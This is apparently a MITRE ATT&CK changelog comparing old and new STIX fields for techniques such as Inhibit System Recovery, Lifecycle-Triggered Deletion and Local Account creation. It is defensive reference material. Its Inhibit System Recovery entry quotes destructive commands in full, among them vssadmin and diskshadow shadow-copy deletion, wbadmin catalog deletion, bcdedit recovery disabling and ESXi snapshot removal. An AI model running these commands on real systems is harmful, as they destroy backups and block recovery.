| heir network – whether via network storage media or through | | ual machines to support [Data Encrypted for Impact](https:// |
| folders that sync to cloud services.(Citation: ZDNet Ransomw | | attack.mitre.org/techniques/T1486), preventing them from bei |
| are Backups 2020) In cloud environments, adversaries may dis | | ng leveraged as backups (e.g., via ` vim-cmd vmsvc/snapshot. |
| able versioning and backup policies and delete snapshots, da | | removeall`).(Citation: Cybereason) Adversaries may also del |
| tabase backups, machine images, and prior versions of object | | ete “online” backups that are connected to their network – w |
| s designed to be used in disaster recovery scenarios.(Citati | | hether via network storage media or through folders that syn |
| on: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino S | | c to cloud services.(Citation: ZDNet Ransomware Backups 2020 |
| ecurity Labs AWS S3 Ransomware) | | ) In cloud environments, adversaries may disable versioning |
| | | and backup policies and delete snapshots, database backups, |
| | | machine images, and prior versions of objects designed to be |
| | | used in disaster recovery scenarios.(Citation: Dark Reading |
| | | Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS |
| | | S3 Ransomware) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-24 13:27:31.881000+00:00 | 2025-04-15 19:59:22.100000+00:00 |
| description | Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
* REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
* diskshadow.exe can be used to delete all volume shadow copies on a system - diskshadow delete shadows all (Citation: Diskshadow) (Citation: Crytox Ransomware)
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware) | Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
* REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
* diskshadow.exe can be used to delete all volume shadow copies on a system - diskshadow delete shadows all (Citation: Diskshadow) (Citation: Crytox Ransomware)
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
On ESXi servers, adversaries may delete or encrypt snapshots of virtual machines to support [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486), preventing them from being leveraged as backups (e.g., via ` vim-cmd vmsvc/snapshot.removeall`).(Citation: Cybereason)
Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware) |
| x_mitre_version | 1.5 | 1.6 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Cybereason', 'description': 'Cybereason Nocturnus. (n.d.). Cybereason vs. BlackCat Ransomware. Retrieved March 26, 2025.', 'url': 'https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware'} |
| x_mitre_platforms | | ESXi |
[T1056] Input Capture
Current version: 1.4
Version changed from: 1.3 → 1.4
New Detections:
- DS0011: Module (Module Load)
- DS0017: Command (Command Execution)
- DS0022: File (File Creation)
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-13 17:33:45.244000+00:00 | 2025-04-15 19:59:02.160000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_data_sources | | Module: Module Load |
| x_mitre_data_sources | | File: File Creation |
| x_mitre_data_sources | | Command: Command Execution |
| x_mitre_platforms | | Network Devices |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | Network | |
[T1553.004] Subvert Trust Controls: Install Root Certificate
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Digital Certificate Validation'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-04 20:01:27.662000+00:00 | 2025-04-15 19:59:06.251000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1218.004] System Binary Proxy Execution: InstallUtil
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application control'] | |
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-11 18:47:52.603000+00:00 | 2025-04-15 19:58:17.302000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
[T1546.016] Event Triggered Execution: Installer Packages
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['root'] | |
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-28 15:52:44.332000+00:00 | 2025-04-15 19:59:13.167000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1559] Inter-Process Communication
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-10 19:06:35.666000+00:00 | 2025-04-15 19:58:57.325000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
[T1491.001] Defacement: Internal Defacement
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | An adversary may deface systems internal to an organization | t | An adversary may deface systems internal to an organization |
| in an attempt to intimidate or mislead users, thus discredit | | in an attempt to intimidate or mislead users, thus discredit |
| ing the integrity of the systems. This may take the form of | | ing the integrity of the systems. This may take the form of |
| modifications to internal websites, or directly to user syst | | modifications to internal websites or server login messages, |
| ems with the replacement of the desktop wallpaper.(Citation: | | or directly to user systems with the replacement of the des |
| Novetta Blockbuster) Disturbing or offensive images may be | | ktop wallpaper.(Citation: Novetta Blockbuster)(Citation: Var |
| used as a part of [Internal Defacement](https://attack.mitre | | onis) Disturbing or offensive images may be used as a part o |
| .org/techniques/T1491/001) in order to cause user discomfort | | f [Internal Defacement](https://attack.mitre.org/techniques/ |
| , or to pressure compliance with accompanying messages. Sinc | | T1491/001) in order to cause user discomfort, or to pressure |
| e internally defacing systems exposes an adversary's presenc | | compliance with accompanying messages. Since internally def |
| e, it often takes place after other intrusion goals have bee | | acing systems exposes an adversary's presence, it often take |
| n accomplished.(Citation: Novetta Blockbuster Destructive Ma | | s place after other intrusion goals have been accomplished.( |
| lware) | | Citation: Novetta Blockbuster Destructive Malware) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-28 18:55:35.988000+00:00 | 2025-04-15 19:58:49.776000+00:00 |
| description | An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware) | An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites or server login messages, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster)(Citation: Varonis) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware) |
| external_references[1]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https:/operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Varonis', 'description': 'Jason Hill. (2023, February 8). VMware ESXi in the Line of Ransomware Fire. Retrieved March 26, 2025.', 'url': 'https://www.varonis.com/blog/vmware-esxi-in-the-line-of-ransomware-fire'} |
| x_mitre_platforms | | ESXi |
[T1090.001] Proxy: Internal Proxy
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-03-07 14:29:02.408000+00:00 | 2025-04-15 19:59:22.365000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | Network Devices |
| x_mitre_platforms | | ESXi |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | Network | |
[T1016.001] System Network Configuration Discovery: Internet Connection Discovery
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-03-25 17:03:26.632000+00:00 | 2025-04-15 19:58:08.048000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1001.001] Data Obfuscation: Junk Data
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-02 20:10:01.862000+00:00 | 2025-04-15 19:59:22.822000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1558.003] Steal or Forge Kerberos Tickets: Kerberoasting
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Valid domain account or the ability to sniff traffic within a domain'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-23 22:20:10.994000+00:00 | 2025-04-15 19:59:20.912000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1547.006] Boot or Logon Autostart Execution: Kernel Modules and Extensions
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['root'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 17:30:54.170000+00:00 | 2025-04-15 19:58:54.982000+00:00 |
| external_references[7]['description'] | Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018. | Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved November 17, 2024. |
| external_references[7]['url'] | http://tldp.org/HOWTO/Module-HOWTO/x197.html | https://tldp.org/HOWTO/Module-HOWTO/x197.html |
| external_references[12]['description'] | Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018. | Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved November 17, 2024. |
| external_references[12]['url'] | http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html | https://tldp.org/LDP/lkmpg/2.4/html/x437.html |
| external_references[17]['description'] | Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018. | Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved November 17, 2024. |
| external_references[17]['url'] | https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ | https://objective-see.org/blog/blog_0x21.html |
| x_mitre_version | 1.3 | 1.4 |
[T1056.001] Input Capture: Keylogging
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-01 14:01:12.167000+00:00 | 2025-04-15 19:58:03.923000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1546.006] Event Triggered Execution: LC_LOAD_DYLIB Addition
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-20 17:08:21.101000+00:00 | 2025-04-16 20:37:15.460000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1547.008] Boot or Logon Autostart Execution: LSASS Driver
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['SYSTEM', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-20 16:34:43.405000+00:00 | 2025-04-16 20:37:22.686000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1570] Lateral Tool Transfer
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-01 13:48:28.738000+00:00 | 2025-04-15 19:59:03.832000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1543.001] Create or Modify System Process: Launch Agent
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-21 16:13:00.598000+00:00 | 2025-04-15 19:59:10.035000+00:00 |
| external_references[6]['description'] | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017. | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved November 17, 2024. |
| external_references[6]['url'] | https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf | https://papers.put.as/papers/macosx/2016/RSA_OSX_Malware.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.4 | 1.5 |
[T1543.004] Create or Modify System Process: Launch Daemon
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['root', 'Administrator'] | |
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:48.453000+00:00 | 2025-04-15 19:58:33.604000+00:00 |
| external_references[5]['description'] | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017. | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved November 17, 2024. |
| external_references[5]['url'] | https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf | https://papers.put.as/papers/macosx/2016/RSA_OSX_Malware.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
[T1569.001] System Services: Launchctl
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-20 20:14:35.179000+00:00 | 2025-04-15 19:58:46.562000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1485.001] Data Destruction: Lifecycle-Triggered Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Adversaries may modify the lifecycle policies of a cloud sto | t | Adversaries may modify the lifecycle policies of a cloud sto |
| rage bucket to destroy all objects stored within. Cloud s | | rage bucket to destroy all objects stored within. Cloud s |
| torage buckets often allow users to set lifecycle policies t | | torage buckets often allow users to set lifecycle policies t |
| o automate the migration, archival, or deletion of objects a | | o automate the migration, archival, or deletion of objects a |
| fter a set period of time.(Citation: AWS Storage Lifecycles) | | fter a set period of time.(Citation: AWS Storage Lifecycles) |
| (Citation: GCP Storage Lifecycles)(Citation: Azure Storage L | | (Citation: GCP Storage Lifecycles)(Citation: Azure Storage L |
| ifecycles) If a threat actor has sufficient permissions to m | | ifecycles) If a threat actor has sufficient permissions to m |
| odify these policies, they may be able to delete all objects | | odify these policies, they may be able to delete all objects |
| at once. For example, in AWS environments, an adversary w | | at once. For example, in AWS environments, an adversary w |
| ith the `PutLifecycleConfiguration` permission may use the ` | | ith the `PutLifecycleConfiguration` permission may use the ` |
| PutBucketLifecycle` API call to apply a lifecycle policy to | | PutBucketLifecycle` API call to apply a lifecycle policy to |
| an S3 bucket that deletes all objects in the bucket after on | | an S3 bucket that deletes all objects in the bucket after on |
| e day.(Citation: Palo Alto Cloud Ransomware) In addition to | | e day.(Citation: Palo Alto Cloud Ransomware)(Citation: Halcy |
| destroying data for purposes of extortion and [Financial The | | on AWS Ransomware 2025) In addition to destroying data for p |
| ft](https://attack.mitre.org/techniques/T1657), adversaries | | urposes of extortion and [Financial Theft](https://attack.mi |
| may also perform this action on buckets storing cloud logs f | | tre.org/techniques/T1657), adversaries may also perform this |
| or [Indicator Removal](https://attack.mitre.org/techniques/T | | action on buckets storing cloud logs for [Indicator Removal |
| 1070).(Citation: Datadog S3 Lifecycle CloudTrail Logs) | | ](https://attack.mitre.org/techniques/T1070).(Citation: Data |
| | | dog S3 Lifecycle CloudTrail Logs) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 21:27:02.481000+00:00 | 2025-04-15 19:58:06.787000+00:00 |
| description | Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.
Cloud storage buckets often allow users to set lifecycle policies to automate the migration, archival, or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation: GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor has sufficient permissions to modify these policies, they may be able to delete all objects at once.
For example, in AWS environments, an adversary with the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle` API call to apply a lifecycle policy to an S3 bucket that deletes all objects in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657), adversaries may also perform this action on buckets storing cloud logs for [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation: Datadog S3 Lifecycle CloudTrail Logs) | Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.
Cloud storage buckets often allow users to set lifecycle policies to automate the migration, archival, or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation: GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor has sufficient permissions to modify these policies, they may be able to delete all objects at once.
For example, in AWS environments, an adversary with the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle` API call to apply a lifecycle policy to an S3 bucket that deletes all objects in the bucket after one day.(Citation: Palo Alto Cloud Ransomware)(Citation: Halcyon AWS Ransomware 2025) In addition to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657), adversaries may also perform this action on buckets storing cloud logs for [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation: Datadog S3 Lifecycle CloudTrail Logs) |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Halcyon AWS Ransomware 2025', 'description': 'Halcyon RISE Team. (2025, January 13). Abusing AWS Native Services: Ransomware Encrypting S3 Buckets with SSE-C. Retrieved March 18, 2025.', 'url': 'https://www.halcyon.ai/blog/abusing-aws-native-services-ransomware-encrypting-s3-buckets-with-sse-c'} |
[T1055.015] Process Injection: ListPlanting
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-14 17:34:33.948000+00:00 | 2025-04-15 19:59:18.862000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1087.001] Account Discovery: Local Account
Current version: 1.5
Version changed from: 1.4 → 1.5
|
|
|---|
| t | Adversaries may attempt to get a listing of local system acc | t | Adversaries may attempt to get a listing of local system acc |
| ounts. This information can help adversaries determine which | | ounts. This information can help adversaries determine which |
| local accounts exist on a system to aid in follow-on behavi | | local accounts exist on a system to aid in follow-on behavi |
| or. Commands such as <code>net user</code> and <code>net lo | | or. Commands such as <code>net user</code> and <code>net lo |
| calgroup</code> of the [Net](https://attack.mitre.org/softwa | | calgroup</code> of the [Net](https://attack.mitre.org/softwa |
| re/S0039) utility and <code>id</code> and <code>groups</code | | re/S0039) utility and <code>id</code> and <code>groups</code |
| > on macOS and Linux can list local users and groups.(Citati | | > on macOS and Linux can list local users and groups.(Citati |
| on: Mandiant APT1)(Citation: id man page)(Citation: groups m | | on: Mandiant APT1)(Citation: id man page)(Citation: groups m |
| an page) On Linux, local users can also be enumerated throug | | an page) On Linux, local users can also be enumerated throug |
| h the use of the <code>/etc/passwd</code> file. On macOS the | | h the use of the <code>/etc/passwd</code> file. On macOS, th |
| <code>dscl . list /Users</code> command can be used to enum | | e <code>dscl . list /Users</code> command can be used to enu |
| erate local accounts. | | merate local accounts. On ESXi servers, the `esxcli system a |
| | | ccount list` command can list local user accounts.(Citation: |
| | | Crowdstrike Hypervisor Jackpotting Pt 2 2021) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-11 23:47:44.655000+00:00 | 2025-04-15 19:58:14.718000+00:00 |
| description | Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groups on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts. | Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groups on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS, the dscl . list /Users command can be used to enumerate local accounts. On ESXi servers, the `esxcli system account list` command can list local user accounts.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021) |
| external_references[4]['description'] | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020. | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql | https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql |
| x_mitre_version | 1.4 | 1.5 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Crowdstrike Hypervisor Jackpotting Pt 2 2021', 'description': 'Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.', 'url': 'https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/'} |
| x_mitre_platforms | | ESXi |
[T1136.001] Create Account: Local Account
Current version: 1.4
Version changed from: 1.3 → 1.4
|
|
|---|
| t | Adversaries may create a local account to maintain access to | t | Adversaries may create a local account to maintain access to |
| victim systems. Local accounts are those configured by an o | | victim systems. Local accounts are those configured by an o |
| rganization for use by users, remote support, services, or f | | rganization for use by users, remote support, services, or f |
| or administration on a single system or service. For examp | | or administration on a single system or service. For examp |
| le, with a sufficient level of access, the Windows <code>net | | le, with a sufficient level of access, the Windows <code>net |
| user /add</code> command can be used to create a local acco | | user /add</code> command can be used to create a local acco |
| unt. On macOS systems the <code>dscl -create</code> command | | unt. In Linux, the `useradd` command can be used, while on |
| can be used to create a local account. Local accounts may al | | macOS systems, the <code>dscl -create</code> command can be |
| so be added to network devices, often via common [Network De | | used. Local accounts may also be added to network devices, o |
| vice CLI](https://attack.mitre.org/techniques/T1059/008) com | | ften via common [Network Device CLI](https://attack.mitre.or |
| mands such as <code>username</code>, or to Kubernetes cluste | | g/techniques/T1059/008) commands such as <code>username</cod |
| rs using the `kubectl` utility.(Citation: cisco_username_cmd | | e>, to ESXi servers via `esxcli system account add`, or to K |
| )(Citation: Kubernetes Service Accounts Security) Such acco | | ubernetes clusters using the `kubectl` utility.(Citation: ci |
| unts may be used to establish secondary credentialed access | | sco_username_cmd)(Citation: Kubernetes Service Accounts Secu |
| that do not require persistent remote access tools to be dep | | rity) Such accounts may be used to establish secondary cred |
| loyed on the system. | | entialed access that do not require persistent remote access |
| | | tools to be deployed on the system. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-16 17:40:37.995000+00:00 | 2025-04-15 19:58:36.237000+00:00 |
| description | Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
For example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as username, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. | Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
For example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. In Linux, the `useradd` command can be used, while on macOS systems, the dscl -create command can be used. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as username, to ESXi servers via `esxcli system account add`, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)
